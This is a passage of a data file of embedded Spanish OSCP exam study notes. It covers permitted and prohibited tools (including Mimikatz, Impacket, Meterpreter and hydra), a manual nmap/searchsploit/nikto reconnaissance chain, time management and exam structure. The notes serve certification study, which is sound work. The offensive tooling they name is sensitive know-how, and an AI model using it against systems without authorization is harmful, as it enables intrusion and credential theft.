-0.11857, 0.04973, -0.09046, 0.05489, -0.03197, 0.04971, -0.0856, -0.11617, -0.09268, -0.05163, 0.13953, -0.06572, 0.04914, -0.01367, -0.04087, 0.05592, -0.07268, -0.07954, -0.00655, -0.00702, -0.07073, -0.04669, -0.01986, 0.06702, 0.06397, 0.05402, 0.03883, -0.02304, 0.03822, -0.00597, -0.05759, -0.06186, 0.12085, -0.02425, 0.00247, 0.05492, -0.16268, -0.00826, 0.03066, -0.03772, -0.02238, -0.02809, -0.0254, 0.0441, -0.1155, -0.0159, -0.04527, -0.04506, 0.00272, -0.0006, -0.02251, -0.03639, 0.03534, 0.01973, 0.01232, -0.00182, 0.06218, 0.00912, 0.09747, 0.0717, -0.02657, -0.00708, 0.01929, -0.01186, -0.13199, -0.03427, -0.0032, -0.08519, -0.01145, -0.10843, 0.0158, -0.06646, 0.01359, 0.0538, -0.03447, -0.06305, 0.0412, -0.00728, -0.03891, -0.06575, -0.07426, -0.04862, -0.0125, -0.03945, 0.03621, 0.1166, -0.06857, -0.0276, -0.01948, -0.03605, -0.00634, 0.00422, -0.04661, -0.06805, 0.00535, 0.02595, 0.07391, 0.03008, -0.03657, -0.00808, -0.04179, -0.02732, 0.04601, 0.02069, -0.02388, -0.02123, 0.05753, -0.04992, 0.01024, -0.01818, -0.04435, -0.08307, -0.06828, 0.04297, -0.05001, 0.02005, 0.08142, 0.05964, 0.06051, -0.05911, 0.07205, 0.02587, 0.01762, 0.03376, -0.04167, -0.03827, 0.06703, 0.03494, 0.0239, -0.06421, 0.01674, -0.0165, -0.07605, -0.06378, -0.02978, -0.11313, 0.04399, 0.03109, -0.04384, 0.07503, 0.02051, 0.03068, -0.05336, -0.01511, 0.09516, -0.03896, -0.02911, -0.0104, -0.01014, 0.07795, -0.04563, -0.02006, -0.00551, 0.02587, 0.06508, 0.0254, -0.02086, 0.02451, -0.02115, 0.00988, 0.04285, 0.03105, 0.0695, 0.00327, 0.04223, -0.05254, 0.06372, -0.01224, 0.02905, 0.01342, -0.03211, -0.05665, 0.03252, 0.03616, -0.00166, -0.03941, -0.06289, 0.02786, 0.0173, -0.03025, -0.00399, -0.10046, 0.00494, -0.01585, 0.04136, -0.02957, -0.04357, 0.0302]} +{"tipo": "metodologia", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "texto": "## ✅ Permitido\n- Nmap + NSE, `enum4linux`, `smbclient`, `rpcclient`, NetExec/CrackMapExec (SMB).\n- Mimikatz, Impacket, BloodHound, Pivoting ligolo-ng.\n- `nikto`, `whatweb`, searchsploit, `hydra`, gobuster/feroxbuster/ffuf (Content discovery).\n- Burp Suite Community (proxy manual; el scanner activo está prohibido, pero no lo necesitas).\n- **Tus propios scripts** (copy-paste permitido).", "v": [-0.04879, -0.21555, -0.1164, -0.11061, 0.07904, -0.27647, -0.09827, -0.03412, -0.08763, 0.01922, -0.00814, -0.03411, 0.06115, -0.11097, -0.04856, 0.0108, -0.1499, -0.07886, 0.01943, 0.05961, 0.06005, 0.11882, -0.10476, -0.00166, 0.03996, 0.05614, 0.02255, 0.10279, -0.10207, 0.02651, 0.00562, -0.03791, 0.04369, -0.01793, -0.01048, -0.1166, 0.05953, -0.05222, -0.01949, 0.20308, 0.09476, 0.0349, -0.14141, 0.00878, 0.04342, -0.08608, -0.02393, -0.09467, -0.00835, 0.01272, -0.07959, -0.03899, -0.23662, -0.00887, -0.05262, -0.0495, 0.06959, -0.02372, 0.02206, 0.02549, 0.04837, -0.02161, 0.02046, -0.07797, 0.04443, -0.03107, 0.06608, 0.02781, -0.1028, 0.04215, -0.09247, 0.06342, 0.05307, -0.07171, 0.05715, -0.0843, 0.01219, -0.13891, 0.16989, 0.0838, -0.06051, -0.00198, -0.08577, -0.05058, -0.02361, -0.05331, 0.05901, -0.09115, -0.0118, 0.00327, 0.15039, -0.04726, 0.00399, 0.0413, 0.045, -0.14888, 0.03203, 0.04963, 0.06762, -0.00378, 0.03979, 0.06949, -0.15077, 0.08864, 0.02462, -0.00725, 0.03396, 0.01462, -0.0386, 0.03697, 0.11928, 0.00097, 0.02886, -0.00297, 0.01612, -0.06492, -0.0071, 0.01582, 0.01608, -0.03975, -0.07871, -0.02651, 0.01989, 0.00566, -0.03337, -0.03838, -0.0424, 0.10777, 0.04593, -0.0711, -0.09203, 0.01154, -0.05914, -0.02322, -0.05598, 0.06383, 0.02351, -0.01759, -0.02101, 0.00731, 0.00761, -0.00836, -0.00602, 0.10634, 0.06828, 0.02285, 0.03467, -0.04876, -0.03096, 0.01733, 0.02907, 0.01141, -0.04827, 0.06982, 0.04209, -0.054, 0.00817, -0.03926, 0.00849, -0.00378, -0.00645, 0.0485, 0.0065, 0.08117, 0.00834, 0.06272, -0.04468, -0.0572, 0.00773, -0.05177, -0.04292, -0.00072, 0.0111, -0.11923, -0.00237, -0.08891, 0.03728, -0.05849, -0.01828, -0.05378, -0.01211, -0.01925, -0.01506, 0.0553, -0.04117, -0.01797, 0.02526, -0.0166, 0.05298, -0.02291, 0.00879, 0.04179, -0.05859, -0.04887, -0.01244, 0.01788, -0.01297, -0.04956, -0.01248, -0.07359, -0.01588, -0.0074, -0.03825, -0.04388, 0.02945, 0.00301, 0.00067, 0.08448, -0.05883, 0.03476, 0.02674, -0.0144, 0.0297, 0.00923, -0.04966, -0.05289, -0.00145, -0.02098, -0.06337, -0.03135, -0.01708, 0.05751, 0.03728, -0.01313, 0.03204, -0.01369, 0.08397, -0.02897, 0.05289, 0.02197, -0.019, 0.01764, -0.05226, -0.04659, 0.04507, 0.00052, 0.00943, 0.00414, -0.03294, -0.04544, 0.02484, 0.00856, -0.03417, -0.00732, -0.05591, -0.09585, -0.00485, 0.05143, 0.01788, -0.02012, 0.0035, -0.0615, 0.02399, -0.09727, 0.04278, 0.01522]} +{"tipo": "metodologia", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "texto": "## ⛔ Prohibido\n- **Metasploit / Meterpreter → solo en UNA máquina.**\n - Solo el **foothold inicial** cuenta como \"uso\"; post-explotación con meterpreter NO cuenta.\n- Explotación automática: `sqlmap` en modo auto, autopwn.\n- Escáneres de vulnerabilidades masivos: **Nessus, OpenVAS, Nexpose, Core Impact**.\n- IA durante el examen.", "v": [-0.12788, -0.15242, -0.15656, -0.08436, 0.00741, -0.10717, -0.10143, -0.04476, -0.20324, -0.02363, -0.17581, -0.07439, 0.00056, 0.03081, -0.01087, 0.05088, 0.02242, -0.11734, -0.06331, 0.12608, -0.0832, -0.02992, -0.12403, -0.08246, 0.02925, 0.19316, -0.16062, 0.08109, -0.16567, 0.03413, -0.07247, 0.07705, 0.00534, -0.0996, 0.07781, -0.15135, -0.03419, -0.03842, 0.1296, 0.09778, 0.11667, 0.13149, -0.047, 0.05296, 0.15524, -0.13673, 0.00308, -0.02293, -0.14148, -0.01069, 0.04029, -0.01689, -0.0576, 0.0505, -0.03188, -0.07094, 0.1439, 0.08405, -0.0985, 0.03918, 0.09796, -0.02361, -0.00466, -0.03118, -0.00822, -0.09319, 0.09816, -0.0235, -0.07581, 0.05547, -0.02912, 0.02151, 0.00086, -0.04665, 0.08106, -0.00873, -0.01823, -0.02722, 0.04066, 0.01251, -0.09978, -0.00678, -0.08395, -0.02611, -0.07133, -0.01353, 0.02504, -0.0556, 0.00989, 0.01677, 0.07027, 0.00326, 0.02352, -0.02586, 0.03054, -0.09081, -0.03369, 0.03517, -0.05085, 0.02109, 0.08463, 0.00756, 0.01787, -0.03327, 0.06748, 0.09369, 0.05109, -0.00297, -0.00256, -0.07032, 0.10067, 0.0285, -0.06966, -0.09494, -0.00879, 0.05121, -0.046, 0.06289, 0.03447, -0.0105, -0.00079, -0.03269, 0.08805, 3e-05, 0.00892, -0.04575, -0.09614, 0.06582, 0.0076, -0.00283, 0.03864, 0.03097, -0.03045, 0.00946, 0.05657, -0.02763, -0.01443, -0.05915, 0.01973, -0.02183, 0.0402, 0.07309, 0.01454, -0.03871, 0.02445, 0.04331, -0.0326, -0.04541, -0.03939, 0.08624, 0.0511, -0.03045, 0.0281, 0.11009, -0.04344, -0.04326, -0.02244, 0.00811, 0.03078, 0.04499, 0.00594, -0.04876, 0.01793, 0.08604, -0.02361, 0.06713, 0.01707, -0.07662, -0.00724, -0.03531, -0.03766, -0.01204, 0.02718, 0.0024, 0.01454, -0.05704, 0.0761, -0.04059, 0.00205, -0.0592, -0.019, 0.00735, -0.03727, -0.00619, -0.0499, 0.01353, -0.01805, -0.06413, 0.05338, -0.01117, 0.01528, 0.06381, 0.01293, -0.03368, 0.03095, 0.00304, 0.0067, 0.00494, -0.02459, -0.01654, -0.06958, -0.02685, -0.07693, -0.02154, 0.03053, 0.01036, -0.01595, 0.03371, -0.1216, 0.05106, 0.01376, -0.05129, 0.05285, -0.05612, -0.08903, -0.07706, 0.01296, 0.0456, -0.0266, 0.02005, -0.03089, 0.04439, 0.04574, 0.00028, -0.00329, 0.01861, 0.06799, -0.02313, 0.08192, -0.00879, -0.04889, 0.01797, -0.02269, -0.0415, 0.04993, -0.0148, 0.05164, -0.00213, -0.04692, -0.06199, 0.01432, 0.07059, -0.01156, -0.05944, -0.03626, -0.06483, 0.01181, 0.01986, 0.01998, -0.06673, -0.00223, -0.00491, -0.01888, -0.0921, 0.03907, -0.00845]} +{"tipo": "metodologia", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "texto": "## Nota práctica\nNessus se aprende para el **trabajo real** (es estándar), pero en el examen se replica a mano:\n```\nnmap -sV → searchsploit → nmap --script vuln / nikto\n```\n\nRelacionado: Estructura del examen · Metodología OSCP · OSCP MOC", "v": [-0.13103, -0.03372, -0.10487, -0.24418, 0.00466, -0.18205, -0.04178, -0.00769, -0.06916, -0.00481, -0.08395, -0.07748, 0.04859, -0.02928, -0.04445, 0.04924, 0.04287, -0.06635, -0.00501, 0.10308, -0.16895, -0.15235, -0.14646, 0.14501, 0.08599, 0.17334, -0.1265, 0.04106, 0.01052, -0.03097, -0.0165, 0.1171, -0.00758, -0.16824, -0.06397, 0.07548, -0.00478, -0.17449, -0.02186, 0.19643, -0.07435, 0.08007, -0.0825, 0.11518, 0.09408, -0.06985, 0.03121, 0.00849, -0.13614, -0.0179, 0.0128, -0.00691, -0.07657, -0.03982, -0.07531, -0.05608, 0.09353, 0.02322, 0.05311, 0.00408, 0.0082, 0.05944, -0.01879, -0.15557, 0.11763, -0.00765, 0.06764, -0.04822, -0.1353, -0.01513, -0.09402, 0.03307, -0.09347, -0.05804, -0.00231, -0.07607, 0.04203, -0.04436, 0.19307, -0.01173, -0.01036, -0.08054, -0.07205, 0.01424, -0.084, -0.02024, 0.00898, -0.00508, -0.02535, -0.01835, 0.05468, 0.0885, -0.00717, -0.06143, 0.05312, -0.12788, -0.00181, -0.05346, 0.01535, -0.02622, 0.03415, 0.07907, -0.0288, 0.0228, -0.05473, 0.10047, 0.04134, 0.04926, 0.00805, -0.036, 0.10945, 0.03425, -0.08667, 0.01206, -0.04319, -0.06337, 0.04539, 0.02383, -0.03178, -0.05191, -0.04571, 0.01716, 0.03482, 0.04345, -0.03645, 0.00265, 0.04561, 0.04476, 0.06957, 0.05918, -0.06171, 0.03658, -0.08701, 0.00626, 0.01973, -0.03426, 0.0174, -0.03692, 0.0251, -0.04327, 0.00358, 0.05658, 0.00661, -0.06658, 0.01226, 0.0112, 0.05011, -0.07458, -0.04792, -0.05898, 0.00207, -0.02212, 0.0257, 0.06313, -0.05616, -0.07209, -0.00239, 0.02448, 0.01903, 0.0429, 0.02671, 0.03934, 0.03262, 0.026, -0.00439, 0.02835, 0.01124, -0.07357, -0.0605, -0.06976, -0.01268, -0.04824, -0.04627, -0.01492, 0.04126, -0.05344, 0.05218, -0.03757, -0.02991, -0.03455, -0.05343, -0.0087, -0.02886, 0.01002, 0.01675, 0.0046, 0.02246, 0.02014, 0.03222, 0.0236, 0.05971, -0.06853, -0.01841, -0.02329, -0.01534, 0.0043, 0.04051, -0.06446, -0.01108, -0.01217, -0.03873, -0.05829, -0.03997, -0.05209, 0.03438, 0.02608, 0.02313, 0.04884, -0.05715, 0.00898, 0.0042, -0.02213, 0.02149, 0.00428, 0.00497, -0.03666, -0.00039, 0.06488, -0.03007, -0.0167, 0.02542, 0.06024, 0.04812, 0.02144, -0.01099, 0.00826, 0.00633, -0.02555, 0.04121, -0.00177, -0.00984, 0.01491, 0.0169, -0.0294, 0.0624, 0.02219, 0.00663, 0.03871, -0.02312, -0.08799, 0.01192, -0.00129, -0.03271, -0.10146, -0.05891, -0.05941, 0.03865, -0.01338, 0.02806, -0.02036, -0.00287, -0.06313, 0.00946, -0.05419, 0.02621, -0.02061]} +{"tipo": "metodologia", "herramienta": "Gestión del tiempo", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Gestión del tiempo.md", "texto": "# Gestión del tiempo\n\n> 24h ≠ 24h. **Duermes 6h. Comes. Te duchas.** El cerebro fresco resuelve; el cansado entra en rabbit-holes.", "v": [0.1775, -0.11299, -0.06447, 0.06196, -0.07358, -0.04926, -0.20118, 0.11804, 0.03977, 0.02994, -0.13115, -0.02832, -0.1505, -0.01122, -0.0587, -0.0495, 0.02651, 0.10906, -0.03418, -0.01734, -0.11736, -0.0802, -0.09107, 0.03414, -0.00732, -0.06526, -0.00771, 0.09558, -0.17554, 0.04661, 0.0582, -0.06758, -0.04626, -0.0317, -0.03843, 0.09454, -0.11422, 0.08998, -0.01545, -0.00171, 0.07356, 0.17799, -0.0688, 0.09295, 0.10032, -0.07804, 0.03651, -0.07664, 0.0069, -0.09095, -0.09098, 0.05999, -0.00543, 0.00323, -0.02484, -0.04816, 0.06632, 0.10289, -0.03054, -0.14149, 0.01208, -0.00558, 0.05479, -0.08137, 0.04004, 0.04505, 0.01979, 0.0077, 0.05746, 0.05148, -0.16858, 0.04005, 0.03522, -0.0868, 0.00368, -0.09667, 0.04192, 0.02402, -0.0041, 0.05509, -0.09238, -0.02118, 0.00952, -0.04838, -0.08318, -0.03129, 0.06861, -0.08182, -0.05207, 0.07615, -0.05251, 0.07975, 0.06919, 0.0626, -0.00647, -0.03364, -0.0081, 0.03054, 0.07328, 0.03072, -0.04402, 0.08404, -0.06615, 0.07549, -0.02407, 0.03488, 0.07818, -0.05306, -0.04223, 0.0265, -0.02029, 0.10069, -0.03644, 0.03795, 0.01946, 0.13117, -0.01986, 0.07016, -0.01005, 0.04178, -0.01793, 0.03585, 0.03009, -0.03988, -0.05001, -0.06997, 0.04385, -0.07103, 0.13217, -0.02004, -0.03268, 0.01322, -0.04211, -0.03951, -0.0221, 0.1359, 0.05275, 0.08613, -0.04243, -0.10054, 0.04588, 0.05539, -0.03398, 0.07092, 0.00591, 0.04965, -0.01998, -0.05997, -0.03071, 0.05499, 0.05683, -0.01181, 0.02914, 0.04815, 0.05398, 0.03251, -0.04499, -0.03171, -0.05073, 0.06578, -0.00641, 0.03675, 0.05853, -0.01534, -0.08858, -0.05709, 0.00528, -0.02608, -0.03699, 0.09864, 0.031, 0.08142, -0.00054, -0.06172, -0.14457, -0.0108, -0.00714, 0.05815, 0.00299, 0.00069, 0.03623, -0.00036, 0.00313, -0.06954, -0.05939, 0.01536, 0.0451, 0.04687, -0.04599, -0.0214, 0.0154, -0.00932, -0.01273, -0.04215, 0.04952, -0.02734, 0.03203, -0.08351, 0.00312, 0.03975, 0.01334, 0.04818, -0.01538, 0.04474, -0.09142, 0.05855, 0.00998, 0.08923, 0.04476, 0.0186, 0.00254, 0.09358, 0.00657, -0.05519, -0.052, -0.00524, -0.01683, -0.02261, 0.03496, 0.02286, -0.03468, 0.06893, 0.0514, 0.02925, -0.03477, 0.01798, 0.08254, 0.13187, 0.02891, 0.03056, -0.06262, -0.01962, -0.07119, -0.05011, 0.0448, -0.00034, -0.07963, -0.04427, 0.0629, -0.0421, 0.0337, 0.00721, -0.01142, 0.03154, -0.08341, 0.01676, 0.01971, -0.02543, 0.04238, 0.0114, -0.09579, 0.02299, -0.03211, -0.06122, 0.01109, -0.07153]} +{"tipo": "metodologia", "herramienta": "Gestión del tiempo", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Gestión del tiempo.md", "texto": "## Reglas\n- **1.5h sin progreso = cambia de máquina.** Cierra, vuelve más tarde con cabeza fresca.\n- Empieza por el **set de AD** (40 pts) con tiempo → ver Estructura del examen.\n- Saca **todos los `user`** antes de pelear un root concreto.\n- Vigila el Egress filtering pronto: descubrir tarde que un puerto está bloqueado cuesta horas.", "v": [0.03614, -0.07866, -0.28746, -0.07085, 0.10609, -0.07692, 0.04324, 0.02326, -0.0079, -0.16068, -0.152, 0.00046, -0.0312, 0.00552, 0.05365, -0.11712, -0.04903, 0.13251, 0.03078, -0.03449, -0.0353, 0.0139, 0.04313, -0.09695, 0.10084, 0.12805, -0.09609, 0.18571, -0.15717, 0.00094, 0.04558, 0.1449, 0.14604, -0.09756, 0.03358, -0.01021, 0.01734, 0.04038, 0.06873, 0.10149, -0.00073, 0.0892, 0.00963, 0.01888, 0.10771, -0.15458, 0.09335, -0.0077, -0.05717, -0.00581, -0.11043, 0.04902, -0.02579, 0.06183, 0.03141, 0.00963, 0.10375, 0.03297, -0.05131, -0.11353, 0.09753, 0.08059, 0.02198, -0.00182, 0.09535, -0.07017, 0.02975, -0.04105, -0.04445, -0.02806, -0.12574, -0.03995, -0.01114, -0.15491, 0.06587, -0.11547, 0.04485, 0.02554, 0.05096, 0.02635, 0.00808, -0.04549, -0.04061, -0.08915, -0.12954, 0.00495, 0.00266, -0.12807, -0.08072, -0.03357, 0.02627, 0.03264, 0.0219, 0.04745, 0.02049, -0.00571, -0.00606, 0.0231, -0.02991, -0.0097, 0.13586, 0.00291, -0.06339, 0.14124, 0.00322, 0.03396, -0.007, -0.07189, 0.03546, -0.06672, -0.00848, 0.00516, 0.00476, -0.01914, -0.02868, 0.00919, -0.05358, 0.00784, -0.02181, -0.05482, 0.02464, -0.06157, -0.00806, -0.018, -0.01917, -0.02504, -0.01127, 0.01037, 0.05521, 0.00764, -0.01232, 0.04149, -0.03925, -0.03094, -0.05664, 0.05105, 0.07429, 0.0244, 0.00082, -0.03157, 0.019, 0.08948, 0.01915, 0.05025, 0.07002, 0.02216, 0.01934, -0.14997, -0.13332, -0.00766, 0.04806, -0.01729, 0.07682, 0.11607, -0.03856, -0.02109, -0.01089, -0.01854, -0.00318, 0.02047, -0.03037, 0.05973, -0.0704, -0.013, -0.01119, 0.00657, -0.07419, -0.01379, 0.04175, -0.02869, -0.01319, -0.03076, -0.06669, -0.03047, -0.00758, -0.07191, 0.01463, -0.03709, -0.01778, -0.02248, -0.01158, 0.01273, -0.02459, -0.00956, -0.07403, -0.01133, -0.06204, -0.01829, 0.01924, 0.00698, 0.06923, 0.0086, -0.04993, 0.01955, -0.00058, 0.04154, -0.01277, -0.06585, -0.03311, -0.00397, 0.00123, 0.04404, -0.03366, -0.03262, -0.06404, 0.02432, 0.01915, -0.00658, -0.02182, 0.03926, -0.00085, 0.09789, 0.01499, -0.01862, -0.0366, -0.06058, -0.0016, -0.0178, -0.03138, 0.06204, -0.04576, 0.07568, 0.01902, 0.02568, 0.00856, -0.00864, 0.09898, 0.04291, 0.11377, 0.02794, -0.02345, 0.01451, 0.007, -0.08541, 0.05632, 0.01909, 0.0137, -0.00376, -0.02946, -0.03631, 0.06512, 0.04306, -0.01328, -0.03094, -0.09126, 0.0037, -0.02459, 0.03304, 0.03244, -0.06647, -0.07238, 0.04372, 0.01682, -0.10607, 0.04143, -0.02691]} +{"tipo": "metodologia", "herramienta": "Gestión del tiempo", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Gestión del tiempo.md", "texto": "## Documentación en vivo\n- Captura **TODO** mientras lo haces (Flameshot/Greenshot), **no al final** — al final no recuerdas el comando exacto.\n- Cada flag con hostname visible. Ver Reporte OSCP.", "v": [-0.03975, -0.07161, -0.1151, -0.06702, -0.00973, -0.17066, 0.01817, 0.0458, 0.07596, -0.00285, -0.07325, -0.1902, -0.10055, 0.08173, 0.08903, 0.08841, 0.06522, -0.08565, -0.06943, 0.0318, -0.08055, 0.00971, -0.08807, -0.05599, 0.08205, 0.01537, -0.00233, 0.07669, -0.11029, -0.11326, 0.18078, 0.00529, 0.02624, -0.02129, -0.05485, -0.03463, -0.02151, -0.10516, -0.07522, 0.26203, -0.01511, 0.09344, -0.13563, 0.10059, 0.00133, -0.03551, 0.08298, 0.04172, 0.10492, -0.07407, 0.08017, -0.04223, -0.13493, 0.00083, -0.07545, 0.0109, 0.07254, -0.05003, -0.00538, -0.05014, 0.0143, -0.01393, 0.11051, -0.0334, 0.02889, -0.00641, -0.00596, -0.00502, 0.03601, 0.06545, -0.06482, 0.07569, 0.01634, -0.02646, 0.03096, -0.03189, 0.01359, -0.05283, 0.10335, 0.09628, -0.09027, -0.09252, -0.17914, 0.01543, -0.06548, -0.12587, -0.02094, -0.00269, -0.02201, -0.07741, 0.14521, 0.06348, 0.04044, 0.07037, 0.05154, -0.03818, 0.04311, 0.04034, 0.00409, 0.01873, 0.02667, 0.15251, -0.0236, 0.03314, 0.08554, 0.06842, 0.0242, -0.04112, 0.01322, 0.11038, 0.00838, -0.00443, -0.01463, 0.03753, 0.00234, -0.06605, -8e-05, -0.01828, 0.10474, -0.11029, -0.04986, -0.01803, 0.05191, 0.06217, 0.06783, -0.01658, -0.10243, 0.0117, 0.05053, 0.0048, -0.11097, 0.02874, 0.03026, -0.06201, -0.00443, 0.10401, -0.01438, -0.00771, -0.00538, -0.01861, 0.01293, -0.00474, 0.02779, -0.00148, 0.05861, 0.02975, -0.03007, -0.04354, -0.03497, 0.06748, 0.07282, 0.00193, -0.05527, -0.037, -0.02477, -0.02296, -0.00726, 0.04276, -0.08162, 0.03165, 0.00755, -0.08659, -0.01141, 0.04552, 0.01249, 0.03059, 0.00873, 0.01466, 0.00661, -0.03375, 0.01982, -0.00175, -0.14507, 0.00513, 0.0162, -0.1419, 0.06343, -0.06216, -0.0128, -0.04433, 0.06555, 0.01647, 0.03227, 0.03334, -0.01522, 0.03852, 0.02671, 0.01202, 0.00838, 0.01152, 0.02834, 0.02791, 0.00394, 0.05033, 0.02975, 0.03798, 0.04102, -0.03223, -0.0245, -0.02682, -0.12076, 0.03266, -0.01673, 0.02321, 0.04078, -0.01089, -0.05282, 0.1245, -0.02565, 0.03684, -0.07661, -0.05972, 0.01558, -0.0303, -0.06977, -0.01401, 0.05902, 0.01858, -0.06139, -0.03239, 0.07216, 0.05857, 0.03074, -0.07024, 0.09134, 0.02122, 0.04815, -0.02576, 0.04515, -0.02153, -0.04517, 0.0207, 0.02137, -0.0488, 0.03332, 0.0015, -0.03195, 0.04076, -0.05631, -0.09482, 0.02365, 0.04359, -0.00357, -0.01733, -0.00484, -0.02548, -0.04484, 0.0029, 0.03895, -0.04491, -0.05213, -0.02755, 0.00877, -0.06672, -0.02758, -0.03765]} +{"tipo": "metodologia", "herramienta": "Gestión del tiempo", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Gestión del tiempo.md", "texto": "## Anti rabbit-hole\n- Enumeración exhaustiva primero, luego un vector a la vez → Trampas de enumeración.\n- Si un vector \"tiene que funcionar\" y llevas 1h, probablemente es un señuelo.\n\nRelacionado: Metodología OSCP · OSCP MOC", "v": [-0.13634, -0.06007, -0.16105, -0.00517, -0.02585, -0.08217, 0.06801, 0.089, 0.0856, 0.00297, -0.09357, -0.11345, 0.22163, 0.0991, 0.04677, 0.1346, 0.0629, -0.06038, 0.01382, -0.05123, -0.08258, -0.0557, -0.08721, 0.06963, 0.1069, 0.12648, 0.01521, 0.03003, -0.06801, -0.05127, -0.04509, 0.06336, 0.03164, -0.03119, -0.11104, 0.01939, -0.10729, -0.1307, 0.03955, 0.19136, -0.01944, 0.09259, -0.12155, 0.14327, 0.02254, -0.03196, 0.02791, -0.00268, -0.02776, -0.03774, -0.10216, -0.03175, -0.18008, -0.05329, -0.071, 0.00101, -0.05035, -0.00385, 0.00119, 0.01311, 0.08373, 0.13342, 0.01322, -0.08969, 0.02001, 0.02871, -0.09763, -0.03408, -0.02218, 0.06638, 0.01387, 0.09901, -0.15249, 0.00675, 0.092, -0.05861, 0.08401, 0.0318, 0.19188, 0.10577, -0.02804, -0.07492, 0.03398, 0.05519, -0.11035, -0.03768, 0.14906, 0.00045, 0.0524, -0.03607, -0.00764, 0.13504, 0.03367, 0.03409, 0.02687, -0.13426, -0.01524, 0.04604, 0.00226, -0.00987, 0.04168, 0.07605, -0.02682, 0.06988, -0.0575, 0.02544, 0.10131, -0.06545, 0.066, -0.00067, 0.05352, 0.02402, 0.00868, -0.0273, -0.22045, -0.03203, -0.03919, -0.00793, -0.06824, -0.03884, -0.08078, 0.04657, -0.0543, -0.04661, -0.05043, -0.04967, 0.01017, 0.05622, 0.09417, 0.05032, -0.03823, -0.08133, -0.08217, -0.00798, -0.04935, 0.01862, -0.01294, 0.01177, 0.06512, -0.05606, -0.00202, 0.03881, 0.0934, -0.04526, 0.02201, 0.05452, -0.04571, -0.06192, -0.03019, 0.0084, -0.00562, 0.03082, 0.01261, 0.05708, 0.06139, -0.05878, -0.04088, 0.01302, -0.03082, 0.05991, 0.09044, 0.00195, 0.03718, -0.00274, 0.03749, -0.00702, 0.01555, -0.00532, -0.04397, 0.01184, 0.00865, -0.00804, -0.07406, -0.01183, -0.0248, -0.0785, -0.00155, -0.00305, 0.01562, -0.00422, -7e-05, -0.00738, -0.00472, -0.05665, 0.01658, -0.07356, 0.03368, 0.0313, -0.03712, 0.03829, 0.02782, -0.04926, 0.00035, 0.00046, -0.02081, -0.07743, 0.04256, 0.02785, -0.01527, 0.04697, -0.06004, -0.01531, 0.03013, 0.00201, 0.03054, 0.01679, 0.00743, 0.02948, -0.0186, 0.02124, 0.04241, 0.04002, 0.03259, -0.04335, 0.00944, -0.03066, 0.02881, 0.07409, -0.02294, 0.03686, 0.022, 0.0156, 0.04503, 0.0322, 0.00642, 0.0149, 0.03771, 0.07421, 0.00324, 0.0173, -0.00383, -0.02939, 0.01706, -0.03146, 0.01887, 0.0278, 5e-05, -0.05747, -0.05606, -0.05076, 0.01749, 0.02297, -0.00419, -0.0311, -0.03924, -0.06864, -0.03435, -0.02734, 0.02149, -0.01984, -0.03288, -0.02643, 0.02615, -0.07502, 0.05584, 0.01104]} +{"tipo": "metodologia", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "texto": "# Estructura del examen\n\n> 24h de máquinas + 24h para el Reporte OSCP. 70/100 puntos para aprobar.", "v": [-0.01051, -0.02958, -0.05004, -0.21237, -0.00664, -0.19261, -0.03861, 0.08293, -0.11395, 0.00904, -0.21656, -0.04246, -0.02873, -0.0025, 0.00508, 0.03309, 0.00913, -0.04239, -0.08785, 0.00874, -0.02259, -0.01272, -0.07932, 0.01702, 0.14613, 0.12078, -0.0916, 0.05402, -0.13197, -0.05819, 0.09084, 0.08414, 0.04272, -0.01532, 0.01257, -0.01477, -0.04294, 0.04837, 0.08342, 0.09572, 0.08261, 0.00426, 0.03638, 0.00588, 0.20993, -0.04256, 0.0759, 0.14733, -0.06144, -0.1615, 0.00479, 0.09971, -0.09953, 0.04112, -0.09242, -0.0382, -0.00249, 0.11044, 0.0213, -0.06766, 0.05574, 0.10394, -0.0424, -0.06491, 0.03629, 0.10784, 0.02874, -0.02824, -0.09225, 0.05889, -0.09887, 0.00034, 0.06878, -0.03877, -0.04184, -0.0769, -0.02221, -0.00358, -0.00405, 0.0512, -0.03275, 0.00018, -0.06823, -0.03319, -0.05812, 0.02195, -0.00869, -0.03773, -0.04176, 0.0183, -0.02609, 0.01319, 0.0444, 0.01573, 0.07018, -0.10857, 0.0132, 0.07391, 0.05458, -0.09754, -0.00313, 0.00356, 0.02428, 0.048, -0.11336, 0.03477, 0.09411, 0.04144, -0.04044, 0.01827, -0.06733, 0.0883, -0.02221, 0.05116, 0.01359, -0.02593, -0.11291, 0.16271, -0.02525, 0.04286, -0.04882, 0.11166, 0.07929, 0.02932, -0.04672, -0.04642, 0.05654, -0.01414, 0.06825, -0.05658, 0.03912, 0.0457, -0.06651, -0.01733, 0.03597, 0.03356, -0.00572, -0.01308, -0.13597, -0.03285, 0.05588, 0.08939, -0.06863, 0.08303, -0.03315, 0.01639, -0.06586, -0.04814, -0.03069, 0.01909, 0.01411, -0.02615, -0.00309, 0.04865, 0.03568, -0.00996, -0.06322, 0.09349, -0.07461, 0.02177, -0.0235, -0.01727, 0.05719, 0.03696, -0.05178, 0.12295, -0.00959, -0.02624, 0.0389, -0.06305, -0.00421, 0.05781, -0.02798, -0.06684, -0.05679, 0.01052, 0.04773, 0.03885, -0.05994, 0.00975, -0.01153, -0.03836, -0.00653, -0.05317, 0.01172, 0.10057, 0.03319, 0.0067, 0.04751, 0.03099, 0.0677, -0.08362, -0.05993, -0.0993, 0.02668, 0.01994, 0.06083, -0.04431, 0.04011, -0.01881, -0.01321, 0.04163, -0.08222, -0.01431, -0.04745, 0.04536, 0.01131, 0.00108, 0.0732, -0.03761, -0.06223, 0.04669, -0.03429, -0.06365, 0.01972, -0.0082, 0.02103, 0.07421, 0.01103, -0.04579, 0.0149, -0.05079, 0.0024, 0.06538, -0.02496, 0.02453, 0.09156, 0.06006, 0.10043, -0.05624, -0.05752, -0.00923, 